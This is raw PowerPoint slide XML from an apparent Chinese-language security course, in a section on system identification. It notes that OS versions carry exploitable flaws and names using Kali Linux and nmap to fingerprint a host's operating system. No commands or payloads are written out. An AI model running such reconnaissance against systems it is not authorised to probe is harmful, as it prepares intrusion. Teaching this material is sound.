        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.3 系统识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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a:xfrm>
            <a:off x="5590261" y="1695539"/>
            <a:ext cx="5567680" cy="2383155"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="5567680" cy="2383155"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="2086569"/>
              <a:ext cx="4902200" cy="2168525"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>       </a:t>
              </a:r>
              <a:r>
                <a:rPr dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>不同的操作系统、相同操作系统的不同版本，都存在着一些可以利用的漏洞。而且，不同的系统会默认开放一些不同的端口和服务。利用Kali Linux进行系统识别，能够获取操作系统和版本号。</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实例】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.3 系统识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap获取主机操作系统信息</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.3 系统识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5242560" y="861695"/>
            <a:ext cx="5080000" cy="1198880"/>
